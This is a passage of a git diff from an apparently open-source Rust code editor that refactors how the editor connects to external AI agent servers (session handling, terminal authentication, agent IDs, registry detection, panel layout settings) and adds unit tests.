ACP supports multiple working directories + let Some(cwd) = work_dirs.ordered_paths().next().cloned() else { + return Task::ready(Err(anyhow!("Working directory cannot be empty"))); + }; - let cwd = cwd.to_path_buf(); let mcp_servers = mcp_servers_for_project(&project, cx); let action_log = cx.new(|_| ActionLog::new(project.clone())); - let title = session - .title - .clone() - .unwrap_or_else(|| self.display_name.clone()); let thread: Entity = cx.new(|cx| { AcpThread::new( None, title, + Some(work_dirs), self.clone(), project, action_log, - session.session_id.clone(), + session_id.clone(), watch::Receiver::constant(self.agent_capabilities.prompt_capabilities.clone()), 
cx, ) }); self.sessions.borrow_mut().insert( - session.session_id.clone(), + session_id.clone(), AcpSession { thread: thread.downgrade(), suppress_abort_err: false, @@ -717,25 +824,30 @@ impl AgentConnection for AcpConnection { }, ); - cx.spawn(async move |_| { + cx.spawn(async move |cx| { let response = match self .connection .resume_session( - acp::ResumeSessionRequest::new(session.session_id.clone(), cwd) + acp::ResumeSessionRequest::new(session_id.clone(), cwd) .mcp_servers(mcp_servers), ) .await { Ok(response) => response, Err(err) => { - self.sessions.borrow_mut().remove(&session.session_id); + self.sessions.borrow_mut().remove(&session_id); return Err(map_acp_error(err)); } }; let (modes, models, config_options) = config_state(response.modes, response.models, response.config_options); - if let Some(session) = self.sessions.borrow_mut().get_mut(&session.session_id) { + + if let Some(config_opts) = config_options.as_ref() { + self.apply_default_config_options(&session_id, config_opts, cx); + } + + if let Some(session) = self.sessions.borrow_mut().get_mut(&session_id) { session.session_modes = modes; session.models = models; session.config_options = config_options.map(ConfigOptions::new); @@ -745,10 +857,53 @@ impl AgentConnection for AcpConnection { }) } + fn supports_close_session(&self) -> bool { + self.agent_capabilities.session_capabilities.close.is_some() + } + + fn close_session( + self: Rc, + session_id: &acp::SessionId, + cx: &mut App, + ) -> Task> { + if !self.supports_close_session() { + return Task::ready(Err(anyhow!(LoadError::Other( + "Closing sessions is not supported by this agent.".into() + )))); + } + + let conn = self.connection.clone(); + let session_id = session_id.clone(); + cx.foreground_executor().spawn(async move { + conn.close_session(acp::CloseSessionRequest::new(session_id.clone())) + .await?; + self.sessions.borrow_mut().remove(&session_id); + Ok(()) + }) + } + fn auth_methods(&self) -> &[acp::AuthMethod] { &self.auth_methods } + fn 
terminal_auth_task( + &self, + method_id: &acp::AuthMethodId, + cx: &App, + ) -> Option { + let method = self + .auth_methods + .iter() + .find(|method| method.id() == method_id)?; + + match method { + acp::AuthMethod::Terminal(terminal) if cx.has_flag::() => { + Some(terminal_auth_task(&self.command, &self.id, terminal)) + } + _ => meta_terminal_auth_task(&self.id, method_id, method), + } + } + fn authenticate(&self, method_id: acp::AuthMethodId, cx: &mut App) -> Task> { let conn = self.connection.clone(); cx.foreground_executor().spawn(async move { @@ -915,6 +1070,149 @@ fn map_acp_error(err: acp::Error) -> anyhow::Error { } } +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn terminal_auth_task_reuses_command_and_merges_args_and_env() { + let command = AgentServerCommand { + path: "/path/to/agent".into(), + args: vec!["--acp".into(), "--verbose".into()], + env: Some(HashMap::from_iter([ + ("BASE".into(), "1".into()), + ("SHARED".into(), "base".into()), + ])), + }; + let method = acp::AuthMethodTerminal::new("login", "Login") + .args(vec!["/auth".into()]) + .env(std::collections::HashMap::from_iter([ + ("EXTRA".into(), "2".into()), + ("SHARED".into(), "override".into()), + ])); + + let terminal_auth_task = terminal_auth_task(&command, &AgentId::new("test-agent"), &method); + + assert_eq!( + terminal_auth_task.command.as_deref(), + Some("/path/to/agent") + ); + assert_eq!(terminal_auth_task.args, vec!["--acp", "--verbose", "/auth"]); + assert_eq!( + terminal_auth_task.env, + HashMap::from_iter([ + ("BASE".into(), "1".into()), + ("SHARED".into(), "override".into()), + ("EXTRA".into(), "2".into()), + ]) + ); + assert_eq!(terminal_auth_task.label, "Login"); + assert_eq!(terminal_auth_task.command_label, "Login"); + } + + #[test] + fn legacy_terminal_auth_task_parses_meta_and_retries_session() { + let method_id = acp::AuthMethodId::new("legacy-login"); + let method = acp::AuthMethod::Agent( + acp::AuthMethodAgent::new(method_id.clone(), 
"Login").meta(acp::Meta::from_iter([( + "terminal-auth".to_string(), + serde_json::json!({ + "label": "legacy /auth", + "command": "legacy-agent", + "args": ["auth", "--interactive"], + "env": { + "AUTH_MODE": "interactive", + }, + }), + )])), + ); + + let terminal_auth_task = + meta_terminal_auth_task(&AgentId::new("test-agent"), &method_id, &method) + .expect("expected legacy terminal auth task"); + + assert_eq!( + terminal_auth_task.id.0, + "external-agent-test-agent-legacy-login-login" + ); + assert_eq!(terminal_auth_task.command.as_deref(), Some("legacy-agent")); + assert_eq!(terminal_auth_task.args, vec!["auth", "--interactive"]); + assert_eq!( + terminal_auth_task.env, + HashMap::from_iter([("AUTH_MODE".into(), "interactive".into())]) + ); + assert_eq!(terminal_auth_task.label, "legacy /auth"); + } + + #[test] + fn legacy_terminal_auth_task_returns_none_for_invalid_meta() { + let method_id = acp::AuthMethodId::new("legacy-login"); + let method = acp::AuthMethod::Agent( + acp::AuthMethodAgent::new(method_id.clone(), "Login").meta(acp::Meta::from_iter([( + "terminal-auth".to_string(), + serde_json::json!({ + "label": "legacy /auth", + }), + )])), + ); + + assert!( + meta_terminal_auth_task(&AgentId::new("test-agent"), &method_id, &method).is_none() + ); + } + + #[test] + fn first_class_terminal_auth_takes_precedence_over_legacy_meta() { + let method_id = acp::AuthMethodId::new("login"); + let method = acp::AuthMethod::Terminal( + acp::AuthMethodTerminal::new(method_id, "Login") + .args(vec!["/auth".into()]) + .env(std::collections::HashMap::from_iter([( + "AUTH_MODE".into(), + "first-class".into(), + )])) + .meta(acp::Meta::from_iter([( + "terminal-auth".to_string(), + serde_json::json!({ + "label": "legacy /auth", + "command": "legacy-agent", + "args": ["legacy-auth"], + "env": { + "AUTH_MODE": "legacy", + }, + }), + )])), + ); + + let command = AgentServerCommand { + path: "/path/to/agent".into(), + args: vec!["--acp".into()], + env: 
Some(HashMap::from_iter([("BASE".into(), "1".into())])), + }; + + let terminal_auth_task = match &method { + acp::AuthMethod::Terminal(terminal) => { + terminal_auth_task(&command, &AgentId::new("test-agent"), terminal) + } + _ => unreachable!(), + }; + + assert_eq!( + terminal_auth_task.command.as_deref(), + Some("/path/to/agent") + ); + assert_eq!(terminal_auth_task.args, vec!["--acp", "/auth"]); + assert_eq!( + terminal_auth_task.env, + HashMap::from_iter([ + ("BASE".into(), "1".into()), + ("AUTH_MODE".into(), "first-class".into()), + ]) + ); + assert_eq!(terminal_auth_task.label, "Login"); + } +} + fn mcp_servers_for_project(project: &Entity, cx: &App) -> Vec { let context_server_store = project.read(cx).context_server_store().read(cx); let is_local = project.read(cx).is_local(); @@ -1169,7 +1467,7 @@ impl acp::Client for ClientDelegate { let outcome = task.await; - Ok(acp::RequestPermissionResponse::new(outcome)) + Ok(acp::RequestPermissionResponse::new(outcome.into())) } async fn write_text_file( @@ -1374,10 +1672,10 @@ impl acp::Client for ClientDelegate { Ok(acp::CreateTerminalResponse::new(terminal_id)) } - async fn kill_terminal_command( + async fn kill_terminal( &self, - args: acp::KillTerminalCommandRequest, - ) -> Result { + args: acp::KillTerminalRequest, + ) -> Result { self.session_thread(&args.session_id)? 
.update(&mut self.cx.clone(), |thread, cx| { thread.kill_terminal(args.terminal_id, cx) diff --git a/crates/agent_servers/src/agent_servers.rs b/crates/agent_servers/src/agent_servers.rs index a07226ca25095fdb7037114d32d5033364a4999f..2016e5aaaa27b62c956c5eee49c989172980de49 100644 --- a/crates/agent_servers/src/agent_servers.rs +++ b/crates/agent_servers/src/agent_servers.rs @@ -9,50 +9,40 @@ use collections::{HashMap, HashSet}; pub use custom::*; use fs::Fs; use http_client::read_no_proxy_from_env; -use project::agent_server_store::AgentServerStore; +use project::{AgentId, Project, agent_server_store::AgentServerStore}; use acp_thread::AgentConnection; use anyhow::Result; -use gpui::{App, AppContext, Entity, SharedString, Task}; -use project::Project; +use gpui::{App, AppContext, Entity, Task}; use settings::SettingsStore; use std::{any::Any, rc::Rc, sync::Arc}; -pub use acp::AcpConnection; +pub use acp::{AcpConnection, GEMINI_TERMINAL_AUTH_METHOD_ID}; pub struct AgentServerDelegate { store: Entity, - project: Entity, - status_tx: Option>, new_version_available: Option>>, } impl AgentServerDelegate { pub fn new( store: Entity, - project: Entity, - status_tx: Option>, new_version_tx: Option>>, ) -> Self { Self { store, - project, - status_tx, new_version_available: new_version_tx, } } - - pub fn project(&self) -> &Entity { - &self.project - } } pub trait AgentServer: Send { fn logo(&self) -> ui::IconName; - fn name(&self) -> SharedString; + fn agent_id(&self) -> AgentId; fn connect( &self, delegate: AgentServerDelegate, + project: Entity, cx: &mut App, ) -> Task>>; diff --git a/crates/agent_servers/src/custom.rs b/crates/agent_servers/src/custom.rs index b0669d1fb69e110f0ba206a3579f16738de5e7e2..fb8d0a515244576d2cf02e4989cbd71beca448c7 100644 --- a/crates/agent_servers/src/custom.rs +++ b/crates/agent_servers/src/custom.rs @@ -3,31 +3,35 @@ use acp_thread::AgentConnection; use agent_client_protocol as acp; use anyhow::{Context as _, Result}; use 
collections::HashSet; -use credentials_provider::CredentialsProvider; use fs::Fs; -use gpui::{App, AppContext as _, SharedString, Task}; +use gpui::{App, AppContext as _, Entity, Task}; use language_model::{ApiKey, EnvVar}; -use project::agent_server_store::{ - AllAgentServersSettings, CLAUDE_AGENT_NAME, CODEX_NAME, ExternalAgentServerName, GEMINI_NAME, +use project::{ + Project, + agent_server_store::{AgentId, AllAgentServersSettings}, }; use settings::{SettingsStore, update_settings_file}; use std::{rc::Rc, sync::Arc}; use ui::IconName; +pub const GEMINI_ID: &str = "gemini"; +pub const CLAUDE_AGENT_ID: &str = "claude-acp"; +pub const CODEX_ID: &str = "codex-acp"; + /// A generic agent server implementation for custom user-defined agents pub struct CustomAgentServer { - name: SharedString, + agent_id: AgentId, } impl CustomAgentServer { - pub fn new(name: SharedString) -> Self { - Self { name } + pub fn new(agent_id: AgentId) -> Self { + Self { agent_id } } } impl AgentServer for CustomAgentServer { - fn name(&self) -> SharedString { - self.name.clone() + fn agent_id(&self) -> AgentId { + self.agent_id.clone() } fn logo(&self) -> IconName { @@ -38,7 +42,7 @@ impl AgentServer for CustomAgentServer { let settings = cx.read_global(|settings: &SettingsStore, _| { settings .get::(None) - .get(self.name().as_ref()) + .get(self.agent_id().0.as_ref()) .cloned() }); @@ -55,7 +59,7 @@ impl AgentServer for CustomAgentServer { let settings = cx.read_global(|settings: &SettingsStore, _| { settings .get::(None) - .get(self.name().as_ref()) + .get(self.agent_id().0.as_ref()) .cloned() }); @@ -80,23 +84,16 @@ impl AgentServer for CustomAgentServer { fs: Arc, cx: &App, ) { - let name = self.name(); + let agent_id = self.agent_id(); let config_id = config_id.to_string(); let value_id = value_id.to_string(); - update_settings_file(fs, cx, move |settings, _| { + update_settings_file(fs, cx, move |settings, cx| { let settings = settings .agent_servers .get_or_insert_default() - 
.entry(name.to_string()) - .or_insert_with(|| settings::CustomAgentServerSettings::Extension { - default_model: None, - default_mode: None, - env: Default::default(), - favorite_models: Vec::new(), - default_config_options: Default::default(), - favorite_config_option_values: Default::default(), - }); + .entry(agent_id.0.to_string()) + .or_insert_with(|| default_settings_for_agent(agent_id, cx)); match settings { settings::CustomAgentServerSettings::Custom { @@ -131,20 +128,13 @@ impl AgentServer for CustomAgentServer { } fn set_default_mode(&self, mode_id: Option, fs: Arc, cx: &mut App) { - let name = self.name(); - update_settings_file(fs, cx, move |settings, _| { + let agent_id = self.agent_id(); + update_settings_file(fs, cx, move |settings, cx| { let settings = settings .agent_servers .get_or_insert_default() - .entry(name.to_string()) - .or_insert_with(|| settings::CustomAgentServerSettings::Extension { - default_model: None, - default_mode: None, - env: Default::default(), - favorite_models: Vec::new(), - default_config_options: Default::default(), - favorite_config_option_values: Default::default(), - }); + .entry(agent_id.0.to_string()) + .or_insert_with(|| default_settings_for_agent(agent_id, cx)); match settings { settings::CustomAgentServerSettings::Custom { default_mode, .. 
} @@ -160,7 +150,7 @@ impl AgentServer for CustomAgentServer { let settings = cx.read_global(|settings: &SettingsStore, _| { settings .get::(None) - .get(self.name().as_ref()) + .get(self.agent_id().as_ref()) .cloned() }); @@ -170,20 +160,13 @@ impl AgentServer for CustomAgentServer { } fn set_default_model(&self, model_id: Option, fs: Arc, cx: &mut App) { - let name = self.name(); - update_settings_file(fs, cx, move |settings, _| { + let agent_id = self.agent_id(); + update_settings_file(fs, cx, move |settings, cx| { let settings = settings .agent_servers .get_or_insert_default() - .entry(name.to_string()) - .or_insert_with(|| settings::CustomAgentServerSettings::Extension { - default_model: None, - default_mode: None, - env: Default::default(), - favorite_models: Vec::new(), - default_config_options: Default::default(), - favorite_config_option_values: Default::default(), - }); + .entry(agent_id.0.to_string()) + .or_insert_with(|| default_settings_for_agent(agent_id, cx)); match settings { settings::CustomAgentServerSettings::Custom { default_model, .. 
} @@ -199,7 +182,7 @@ impl AgentServer for CustomAgentServer { let settings = cx.read_global(|settings: &SettingsStore, _| { settings .get::(None) - .get(self.name().as_ref()) + .get(self.agent_id().as_ref()) .cloned() }); @@ -221,20 +204,13 @@ impl AgentServer for CustomAgentServer { fs: Arc, cx: &App, ) { - let name = self.name(); - update_settings_file(fs, cx, move |settings, _| { + let agent_id = self.agent_id(); + update_settings_file(fs, cx, move |settings, cx| { let settings = settings .agent_servers .get_or_insert_default() - .entry(name.to_string()) - .or_insert_with(|| settings::CustomAgentServerSettings::Extension { - default_model: None, - default_mode: None, - env: Default::default(), - favorite_models: Vec::new(), - default_config_options: Default::default(), - favorite_config_option_values: Default::default(), - }); + .entry(agent_id.0.to_string()) + .or_insert_with(|| default_settings_for_agent(agent_id, cx)); let favorite_models = match settings { settings::CustomAgentServerSettings::Custom { @@ -263,7 +239,7 @@ impl AgentServer for CustomAgentServer { let settings = cx.read_global(|settings: &SettingsStore, _| { settings .get::(None) - .get(self.name().as_ref()) + .get(self.agent_id().as_ref()) .cloned() }); @@ -279,22 +255,15 @@ impl AgentServer for CustomAgentServer { fs: Arc, cx: &mut App, ) { - let name = self.name(); + let agent_id = self.agent_id(); let config_id = config_id.to_string(); let value_id = value_id.map(|s| s.to_string()); - update_settings_file(fs, cx, move |settings, _| { + update_settings_file(fs, cx, move |settings, cx| { let settings = settings .agent_servers .get_or_insert_default() - .entry(name.to_string()) - .or_insert_with(|| settings::CustomAgentServerSettings::Extension { - default_model: None, - default_mode: None, - env: Default::default(), - favorite_models: Vec::new(), - default_config_options: Default::default(), - favorite_config_option_values: Default::default(), - }); + .entry(agent_id.0.to_string()) + 
.or_insert_with(|| default_settings_for_agent(agent_id, cx)); match settings { settings::CustomAgentServerSettings::Custom { @@ -322,55 +291,33 @@ impl AgentServer for CustomAgentServer { fn connect( &self, delegate: AgentServerDelegate, + project: Entity, cx: &mut App, ) -> Task>> { - let name = self.name(); - let display_name = delegate - .store - .read(cx) - .agent_display_name(&ExternalAgentServerName(name.clone())) - .unwrap_or_else(|| name.clone()); + let agent_id = self.agent_id(); let default_mode = self.default_mode(cx); let default_model = self.default_model(cx); - let is_previous_built_in = - matches!(name.as_ref(), CLAUDE_AGENT_NAME | CODEX_NAME | GEMINI_NAME); - let (default_config_options, is_registry_agent) = - cx.read_global(|settings: &SettingsStore, _| { - let agent_settings = settings - .get::(None) - .get(self.name().as_ref()); - - let is_registry = agent_settings - .map(|s| { - matches!( - s, - project::agent_server_store::CustomAgentServerSettings::Registry { .. } - ) - }) - .unwrap_or(false); - - let config_options = agent_settings - .map(|s| match s { - project::agent_server_store::CustomAgentServerSettings::Custom { - default_config_options, - .. - } - | project::agent_server_store::CustomAgentServerSettings::Extension { - default_config_options, - .. - } - | project::agent_server_store::CustomAgentServerSettings::Registry { - default_config_options, - .. - } => default_config_options.clone(), - }) - .unwrap_or_default(); - - (config_options, is_registry) - }); - - // Intermediate step to allow for previous built-ins to also be triggered if they aren't in settings yet. 
- let is_registry_agent = is_registry_agent || is_previous_built_in; + let is_registry_agent = is_registry_agent(agent_id.clone(), cx); + let default_config_options = cx.read_global(|settings: &SettingsStore, _| { + settings + .get::(None) + .get(self.agent_id().as_ref()) + .map(|s| match s { + project::agent_server_store::CustomAgentServerSettings::Custom { + default_config_options, + .. + } + | project::agent_server_store::CustomAgentServerSettings::Extension { + default_config_options, + .. + } + | project::agent_server_store::CustomAgentServerSettings::Registry { + default_config_options, + .. + } => default_config_options.clone(), + }) + .unwrap_or_default() + }); if is_registry_agent { if let Some(registry_store) = project::AgentRegistryStore::try_global(cx) { @@ -383,11 +330,11 @@ impl AgentServer for CustomAgentServer { extra_env.insert("NO_BROWSER".to_owned(), "1".to_owned()); } if is_registry_agent { - match name.as_ref() { - CLAUDE_AGENT_NAME => { + match agent_id.as_ref() { + CLAUDE_AGENT_ID => { extra_env.insert("ANTHROPIC_API_KEY".into(), "".into()); } - CODEX_NAME => { + CODEX_ID => { if let Ok(api_key) = std::env::var("CODEX_API_KEY") { extra_env.insert("CODEX_API_KEY".into(), api_key); } @@ -395,7 +342,7 @@ impl AgentServer for CustomAgentServer { extra_env.insert("OPEN_AI_API_KEY".into(), api_key); } } - GEMINI_NAME => { + GEMINI_ID => { extra_env.insert("SURFACE".to_owned(), "zed".to_owned()); } _ => {} @@ -403,29 +350,26 @@ impl AgentServer for CustomAgentServer { } let store = delegate.store.downgrade(); cx.spawn(async move |cx| { - if is_registry_agent && name.as_ref() == GEMINI_NAME { + if is_registry_agent && agent_id.as_ref() == GEMINI_ID { if let Some(api_key) = cx.update(api_key_for_gemini_cli).await.ok() { extra_env.insert("GEMINI_API_KEY".into(), api_key); } } let command = store .update(cx, |store, cx| { - let agent = store - .get_external_agent(&ExternalAgentServerName(name.clone())) - .with_context(|| { - format!("Custom agent server 
`{}` is not registered", name) - })?; + let agent = store.get_external_agent(&agent_id).with_context(|| { + format!("Custom agent server `{}` is not registered", agent_id) + })?; anyhow::Ok(agent.get_command( extra_env, - delegate.status_tx, delegate.new_version_available, &mut cx.to_async(), )) })?? .await?; let connection = crate::acp::connect( - name, - display_name, + agent_id, + project, command, default_mode, default_model, @@ -447,7 +391,7 @@ fn api_key_for_gemini_cli(cx: &mut App) -> Task> { if let Some(key) = env_var.value { return Task::ready(Ok(key)); } - let credentials_provider = ::global(cx); + let credentials_provider = zed_credentials_provider::global(cx); let api_url = google_ai::API_URL.to_string(); cx.spawn(async move |cx| { Ok( @@ -458,3 +402,198 @@ fn api_key_for_gemini_cli(cx: &mut App) -> Task> { ) }) } + +fn is_registry_agent(agent_id: impl Into, cx: &App) -> bool { + let agent_id = agent_id.into(); + let is_in_registry = project::AgentRegistryStore::try_global(cx) + .map(|store| store.read(cx).agent(&agent_id).is_some()) + .unwrap_or(false); + let is_settings_registry = cx.read_global(|settings: &SettingsStore, _| { + settings + .get::(None) + .get(agent_id.as_ref()) + .is_some_and(|s| { + matches!( + s, + project::agent_server_store::CustomAgentServerSettings::Registry { .. 
} + ) + }) + }); + is_in_registry || is_settings_registry +} + +fn default_settings_for_agent( + agent_id: impl Into, + cx: &App, +) -> settings::CustomAgentServerSettings { + if is_registry_agent(agent_id, cx) { + settings::CustomAgentServerSettings::Registry { + default_model: None, + default_mode: None, + env: Default::default(), + favorite_models: Vec::new(), + default_config_options: Default::default(), + favorite_config_option_values: Default::default(), + } + } else { + settings::CustomAgentServerSettings::Extension { + default_model: None, + default_mode: None, + env: Default::default(), + favorite_models: Vec::new(), + default_config_options: Default::default(), + favorite_config_option_values: Default::default(), + } + } +} + +#[cfg(test)] +mod tests { + use super::*; + use collections::HashMap; + use gpui::TestAppContext; + use project::agent_registry_store::{ + AgentRegistryStore, RegistryAgent, RegistryAgentMetadata, RegistryNpxAgent, + }; + use settings::Settings as _; + use ui::SharedString; + + fn init_test(cx: &mut TestAppContext) { + cx.update(|cx| { + let settings_store = SettingsStore::test(cx); + cx.set_global(settings_store); + }); + } + + fn init_registry_with_agents(cx: &mut TestAppContext, agent_ids: &[&str]) { + let agents: Vec = agent_ids + .iter() + .map(|id| { + let id = SharedString::from(id.to_string()); + RegistryAgent::Npx(RegistryNpxAgent { + metadata: RegistryAgentMetadata { + id: AgentId::new(id.clone()), + name: id.clone(), + description: SharedString::from(""), + version: SharedString::from("1.0.0"), + repository: None, + website: None, + icon_path: None, + }, + package: id, + args: Vec::new(), + env: HashMap::default(), + }) + }) + .collect(); + cx.update(|cx| { + AgentRegistryStore::init_test_global(cx, agents); + }); + } + + fn set_agent_server_settings( + cx: &mut TestAppContext, + entries: Vec<(&str, settings::CustomAgentServerSettings)>, + ) { + cx.update(|cx| { + AllAgentServersSettings::override_global( + 
project::agent_server_store::AllAgentServersSettings( + entries + .into_iter() + .map(|(name, settings)| (name.to_string(), settings.into())) + .collect(), + ), + cx, + ); + }); + } + + #[gpui::test] + fn test_unknown_agent_is_not_registry(cx: &mut TestAppContext) { + init_test(cx); + cx.update(|cx| { + assert!(!is_registry_agent("my-custom-agent", cx)); + }); + } + + #[gpui::test] + fn test_agent_in_registry_store_is_registry(cx: &mut TestAppContext) { + init_test(cx); + init_registry_with_agents(cx, &["some-new-registry-agent"]); + cx.update(|cx| { + assert!(is_registry_agent("some-new-registry-agent", cx)); + assert!(!is_registry_agent("not-in-registry", cx)); + }); + } + + #[gpui::test] + fn test_agent_with_registry_settings_type_is_registry(cx: &mut TestAppContext) { + init_test(cx); + set_agent_server_settings( + cx, + vec![( + "agent-from-settings", + settings::CustomAgentServerSettings::Registry { + env: HashMap::default(), + default_mode: None, + default_model: None, + favorite_models: Vec::new(), + default_config_options: HashMap::default(), + favorite_config_option_values: HashMap::default(), + }, + )], + ); + cx.update(|cx| { + assert!(is_registry_agent("agent-from-settings", cx)); + }); + } + + #[gpui::test] + fn test_agent_with_extension_settings_type_is_not_registry(cx: &mut TestAppContext) { + init_test(cx); + set_agent_server_settings( + cx, + vec![( + "my-extension-agent", + settings::CustomAgentServerSettings::Extension { + env: HashMap::default(), + default_mode: None, + default_model: None, + favorite_models: Vec::new(), + default_config_options: HashMap::default(), + favorite_config_option_values: HashMap::default(), + }, + )], + ); + cx.update(|cx| { + assert!(!is_registry_agent("my-extension-agent", cx)); + }); + } + + #[gpui::test] + fn test_default_settings_for_extension_agent(cx: &mut TestAppContext) { + init_test(cx); + cx.update(|cx| { + assert!(matches!( + default_settings_for_agent("some-extension-agent", cx), + 
settings::CustomAgentServerSettings::Extension { .. } + )); + }); + } + + #[gpui::test] + fn test_default_settings_for_agent_in_registry(cx: &mut TestAppContext) { + init_test(cx); + init_registry_with_agents(cx, &["new-registry-agent"]); + cx.update(|cx| { + assert!(matches!( + default_settings_for_agent("new-registry-agent", cx), + settings::CustomAgentServerSettings::Registry { .. } + )); + assert!(matches!( + default_settings_for_agent("not-in-registry", cx), + settings::CustomAgentServerSettings::Extension { .. } + )); + }); + } +} diff --git a/crates/agent_servers/src/e2e_tests.rs b/crates/agent_servers/src/e2e_tests.rs index c5754bcd7610dbf0c858058ea726a746bef37ab1..aa29a0c230c13949b15f2b39a245ae41ead4884d 100644 --- a/crates/agent_servers/src/e2e_tests.rs +++ b/crates/agent_servers/src/e2e_tests.rs @@ -1,7 +1,9 @@ use crate::{AgentServer, AgentServerDelegate}; use acp_thread::{AcpThread, AgentThreadEntry, ToolCall, ToolCallStatus}; use agent_client_protocol as acp; +use client::RefreshLlmTokenListener; use futures::{FutureExt, StreamExt, channel::mpsc, select}; +use gpui::AppContext; use gpui::{Entity, TestAppContext}; use indoc::indoc; use project::{FakeFs, Project}; @@ -13,6 +15,7 @@ use std::{ time::Duration, }; use util::path; +use util::path_list::PathList; pub async fn test_basic(server: F, cx: &mut TestAppContext) where @@ -206,8 +209,10 @@ pub async fn test_tool_call_with_permission( thread.update(cx, |thread, cx| { thread.authorize_tool_call( tool_call_id, - allow_option_id, - acp::PermissionOptionKind::AllowOnce, + acp_thread::SelectedPermissionOutcome::new( + allow_option_id, + acp::PermissionOptionKind::AllowOnce, + ), cx, ); @@ -408,7 +413,9 @@ pub async fn init_test(cx: &mut TestAppContext) -> Arc { let http_client = reqwest_client::ReqwestClient::user_agent("agent tests").unwrap(); cx.set_http_client(Arc::new(http_client)); let client = client::Client::production(cx); - language_model::init(client, cx); + let user_store = cx.new(|cx| 
client::UserStore::new(client.clone(), cx)); + language_model::init(cx); + RefreshLlmTokenListener::register(client.clone(), user_store, cx); #[cfg(test)] project::agent_server_store::AllAgentServersSettings::override_global( @@ -429,13 +436,18 @@ pub async fn new_test_thread( cx: &mut TestAppContext, ) -> Entity { let store = project.read_with(cx, |project, _| project.agent_server_store().clone()); - let delegate = AgentServerDelegate::new(store, project.clone(), None, None); + let delegate = AgentServerDelegate::new(store, None); - let connection = cx.update(|cx| server.connect(delegate, cx)).await.unwrap(); - - cx.update(|cx| connection.new_session(project.clone(), current_dir.as_ref(), cx)) + let connection = cx + .update(|cx| server.connect(delegate, project.clone(), cx)) .await - .unwrap() + .unwrap(); + + cx.update(|cx| { + connection.new_session(project.clone(), PathList::new(&[current_dir.as_ref()]), cx) + }) + .await + .unwrap() } pub async fn run_until_first_tool_call( diff --git a/crates/agent_settings/Cargo.toml b/crates/agent_settings/Cargo.toml index 01f74de2f2ca5be863dbe27174e5131b9b8a657c..b2db5677dcfdc0994e7ce7a03c9c1dd850eb8514 100644 --- a/crates/agent_settings/Cargo.toml +++ b/crates/agent_settings/Cargo.toml @@ -31,6 +31,7 @@ util.workspace = true fs.workspace = true gpui = { workspace = true, features = ["test-support"] } paths.workspace = true + serde_json_lenient.workspace = true serde_json.workspace = true settings = { workspace = true, features = ["test-support"] } diff --git a/crates/agent_settings/src/agent_settings.rs b/crates/agent_settings/src/agent_settings.rs index 02341af42b9247ba07cb3f8c771a51626cd721ed..0c68d2f25d54f966d1cc0a93476457bbba79c959 100644 --- a/crates/agent_settings/src/agent_settings.rs +++ b/crates/agent_settings/src/agent_settings.rs @@ -5,14 +5,17 @@ use std::sync::{Arc, LazyLock}; use agent_client_protocol::ModelId; use collections::{HashSet, IndexMap}; +use fs::Fs; use gpui::{App, Pixels, px}; use 
language_model::LanguageModel; use project::DisableAiSettings; use schemars::JsonSchema; use serde::{Deserialize, Serialize}; use settings::{ - DefaultAgentView, DockPosition, LanguageModelParameters, LanguageModelSelection, - NotifyWhenAgentWaiting, RegisterSetting, Settings, ToolPermissionMode, + DockPosition, DockSide, LanguageModelParameters, LanguageModelSelection, NewThreadLocation, + NotifyWhenAgentWaiting, PlaySoundWhenAgentDone, RegisterSetting, Settings, SettingsContent, + SettingsStore, SidebarDockPosition, SidebarSide, ThinkingBlockDisplay, ToolPermissionMode, + update_settings_file, }; pub use crate::agent_profile::*; @@ -21,11 +24,134 @@ pub const SUMMARIZE_THREAD_PROMPT: &str = include_str!("prompts/summarize_thread pub const SUMMARIZE_THREAD_DETAILED_PROMPT: &str = include_str!("prompts/summarize_thread_detailed_prompt.txt"); +#[derive(Debug, Clone, Default, PartialEq, Eq)] +pub struct PanelLayout { + pub(crate) agent_dock: Option, + pub(crate) project_panel_dock: Option, + pub(crate) outline_panel_dock: Option, + pub(crate) collaboration_panel_dock: Option, + pub(crate) git_panel_dock: Option, + pub(crate) notification_panel_button: Option, +} + +impl PanelLayout { + const AGENT: Self = Self { + agent_dock: Some(DockPosition::Left), + project_panel_dock: Some(DockSide::Right), + outline_panel_dock: Some(DockSide::Right), + collaboration_panel_dock: Some(DockPosition::Right), + git_panel_dock: Some(DockPosition::Right), + notification_panel_button: Some(false), + }; + + const EDITOR: Self = Self { + agent_dock: Some(DockPosition::Right), + project_panel_dock: Some(DockSide::Left), + outline_panel_dock: Some(DockSide::Left), + collaboration_panel_dock: Some(DockPosition::Left), + git_panel_dock: Some(DockPosition::Left), + notification_panel_button: Some(true), + }; + + pub fn is_agent_layout(&self) -> bool { + *self == Self::AGENT + } + + pub fn is_editor_layout(&self) -> bool { + *self == Self::EDITOR + } + + fn read_from(content: &SettingsContent) 
-> Self { + Self { + agent_dock: content.agent.as_ref().and_then(|a| a.dock), + project_panel_dock: content.project_panel.as_ref().and_then(|p| p.dock), + outline_panel_dock: content.outline_panel.as_ref().and_then(|p| p.dock), + collaboration_panel_dock: content.collaboration_panel.as_ref().and_then(|p| p.dock), + git_panel_dock: content.git_panel.as_ref().and_then(|p| p.dock), + notification_panel_button: content.notification_panel.as_ref().and_then(|p| p.button), + } + } + + fn write_to(&self, settings: &mut SettingsContent) { + settings.agent.get_or_insert_default().dock = self.agent_dock; + settings.project_panel.get_or_insert_default().dock = self.project_panel_dock; + settings.outline_panel.get_or_insert_default().dock = self.outline_panel_dock; + settings.collaboration_panel.get_or_insert_default().dock = self.collaboration_panel_dock; + settings.git_panel.get_or_insert_default().dock = self.git_panel_dock; + settings.notification_panel.get_or_insert_default().button = self.notification_panel_button; + } + + fn write_diff_to(&self, current_merged: &PanelLayout, settings: &mut SettingsContent) { + if self.agent_dock != current_merged.agent_dock { + settings.agent.get_or_insert_default().dock = self.agent_dock; + } + if self.project_panel_dock != current_merged.project_panel_dock { + settings.project_panel.get_or_insert_default().dock = self.project_panel_dock; + } + if self.outline_panel_dock != current_merged.outline_panel_dock { + settings.outline_panel.get_or_insert_default().dock = self.outline_panel_dock; + } + if self.collaboration_panel_dock != current_merged.collaboration_panel_dock { + settings.collaboration_panel.get_or_insert_default().dock = + self.collaboration_panel_dock; + } + if self.git_panel_dock != current_merged.git_panel_dock { + settings.git_panel.get_or_insert_default().dock = self.git_panel_dock; + } + if self.notification_panel_button != current_merged.notification_panel_button { + 
